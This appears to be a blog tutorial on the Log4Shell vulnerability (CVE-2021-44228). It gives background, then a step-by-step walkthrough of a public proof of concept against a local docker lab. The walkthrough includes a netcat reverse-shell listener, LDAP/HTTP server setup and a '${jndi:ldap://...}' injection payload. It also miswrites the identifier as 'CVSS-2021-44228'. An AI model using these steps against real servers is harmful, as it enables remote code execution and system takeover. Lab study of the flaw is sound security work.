Log4j is a fast, reliable and flexible logging framework which is written in java. It is an open-source logging API for java.
Simply the logging means some way to indicate the state of the system at runtime. Logs are used to capture and persists the important data and make it available for analysis at any point in time.
The Log4j vulnerability, also known as “Log4Shell” or “CVSS-2021-44228,” is a critical security vulnerability that affects the Apache Log4j library, which is a widely used Java-based logging utility. This vulnerability allows attackers to execute arbitrary code remotely by sending specially crafted requests to a server that uses the vulnerable Log4j library for logging purposes. The vulnerability was assigned the identifier CVE-2021-44228.
Background: Log4j is an open-source logging library for Java applications, widely used to capture application log messages. It allows developers to control the output of log messages and configure various log levels. Unfortunately, a critical vulnerability was discovered in Log4j that allowed attackers to execute malicious code remotely. The vulnerability stemmed from the way Log4j processed user-provided data in its logging feature.
Impact: The Log4j vulnerability had the potential to be extremely damaging due to its widespread usage and the nature of the attack vector. If exploited successfully, attackers could execute arbitrary code on affected servers, potentially leading to complete compromise of the system, data theft, or further attacks on internal networks. The vulnerability’s impact was not limited to specific industries or organizations, as Log4j is used in a wide variety of applications and services.
How Hackers Exploit this
Use This github link to install : https://github.com/kozmer/log4j-shell-poc
For the additional requirements use
pip install -r requirements.txt Start a netcat listener to accept reverse shell connection nc -lvnp 9001 To launch this exploit you have to install "java jdk1.8.0_20" and it should be present in the same directory After you have successfully install java in your system then the name command is "python3 poc.py --userip localhost --webport 8000 --lport 9001" This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport. Now Open the new terminal and use this command
1: docker build -t log4j-shell-poc . 2: docker run --network host log4j-shell-poc
Once it is running, you can access it on localhost:8080
on the username
Type this command:
"${jndi:ldap://localhost:1389/a}" for this to run on your localhost add 127.0.0.1 instead of localhost and for the password field type "password" and then go to the netcat listener and there you got the reverse shell connection and the exploit is successfully completed.